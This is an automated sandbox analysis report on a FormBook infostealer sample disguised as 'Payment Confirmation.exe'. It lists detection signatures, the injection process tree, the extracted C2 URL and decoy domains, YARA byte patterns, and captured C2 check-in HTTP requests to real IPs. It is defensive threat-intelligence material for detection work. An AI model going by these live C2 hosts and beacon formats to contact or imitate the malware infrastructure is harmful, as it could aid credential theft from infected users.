Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Payment Confirmation.exe

Overview

General Information

Sample Name:Payment Confirmation.exe
Analysis ID:502129
MD5:98ffc3c812e6cec919ebd286973e2002
SHA1:b0d1a65445a7923870ad23ec4d80f592e808c987
SHA256:014d0ece0d472eaea73698d634308303ddb9f227f39d339a66416c3cb744d2c1
Tags:exeformbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Payment Confirmation.exe (PID: 2244 cmdline: 'C:\Users\user\Desktop\Payment Confirmation.exe' MD5: 98FFC3C812E6CEC919EBD286973E2002)
    • Payment Confirmation.exe (PID: 5440 cmdline: 'C:\Users\user\Desktop\Payment Confirmation.exe' MD5: 98FFC3C812E6CEC919EBD286973E2002)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 1516 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 4852 cmdline: /c del 'C:\Users\user\Desktop\Payment Confirmation.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x6af8:$sqlite3text: 68 38 2A 90 C5
    • 0x6c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.1.Payment Confirmation.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.1.Payment Confirmation.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.1.Payment Confirmation.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        4.2.Payment Confirmation.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.Payment Confirmation.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Payment Confirmation.exeVirustotal: Detection: 24%Perma Link
          Source: Payment Confirmation.exeReversingLabs: Detection: 20%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.thesewhitevvalls.comVirustotal: Detection: 6%Perma Link
          Machine Learning detection for sampleShow sources
          Source: Payment Confirmation.exeJoe Sandbox ML: detected
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.msiexec.exe.49f796c.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 4.2.Payment Confirmation.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.1.Payment Confirmation.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Payment Confirmation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: msiexec.pdb source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000001.00000003.364311124.000000000F080000.00000004.00000001.sdmp, Payment Confirmation.exe, 00000004.00000002.437196803.0000000000960000.00000040.00000001.sdmp, msiexec.exe, 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, msiexec.exe
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00402671 FindFirstFileA,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.206.159.80 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.91.80.182 80
          Source: C:\Windows\explorer.exeDomain query: www.thesewhitevvalls.com
          Source: C:\Windows\explorer.exeDomain query: www.lumberjackguitarloops.com
          Source: C:\Windows\explorer.exeDomain query: www.elliotpioneer.com
          Source: C:\Windows\explorer.exeDomain query: www.carts-amazon.com
          Source: C:\Windows\explorer.exeDomain query: www.chinaopedia.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80
          Source: C:\Windows\explorer.exeDomain query: www.anadolu.academy
          Source: C:\Windows\explorer.exeDomain query: www.playstarexch.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.105.103.207 80
          Source: C:\Windows\explorer.exeNetwork Connect: 62.210.5.81 80
          Source: C:\Windows\explorer.exeDomain query: www.altitudebc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 94.73.147.156 80
          Source: C:\Windows\explorer.exeDomain query: www.unasolucioendesa.com
          Source: C:\Windows\explorer.exeDomain query: www.atp-cayenne.com
          Source: C:\Windows\explorer.exeNetwork Connect: 82.98.134.154 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.thesewhitevvalls.com/b2c0/
          Source: Joe Sandbox ViewASN Name: ASIANETGB ASIANETGB
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1Host: www.playstarexch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz HTTP/1.1Host: www.anadolu.academyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== HTTP/1.1Host: www.altitudebc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz HTTP/1.1Host: www.unasolucioendesa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== HTTP/1.1Host: www.elliotpioneer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1Host: www.thesewhitevvalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== HTTP/1.1Host: www.lumberjackguitarloops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.carts-amazon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== HTTP/1.1Host: www.chinaopedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.atp-cayenne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.206.159.80 52.206.159.80
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:32:21 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 1237Date: Wed, 13 Oct 2021 14:32:26 GMTServer: LiteSpeedVary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:32:42 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
